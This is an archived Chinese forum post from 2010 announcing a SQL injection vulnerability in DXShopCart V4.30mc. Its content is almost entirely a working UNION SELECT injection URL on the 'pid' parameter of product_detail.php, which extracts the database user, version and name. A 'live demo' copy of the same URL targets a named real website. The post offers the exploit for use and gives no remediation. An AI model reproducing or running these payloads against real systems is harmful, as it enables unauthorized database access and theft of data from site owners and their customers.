DXShopCart V4.30mc(pid)SQL注射漏洞

西道胜 发表于 2010-1-3 09:48:14

www..com/Script/product_detail.php?cid=12&pid=-1+union+select+1,2,c
oncat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16
--

L!VE DEMO:

http://www.scripts4profit.net/ShopCartDX/product_detail.php?cid=12&pid=-1+u
nion+select+1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,
11,12,13,14,15,16--

页: [1]

WPE|52wpe|我爱WPE's Archiver

DXShopCart V4.30mc(pid)SQL注射漏洞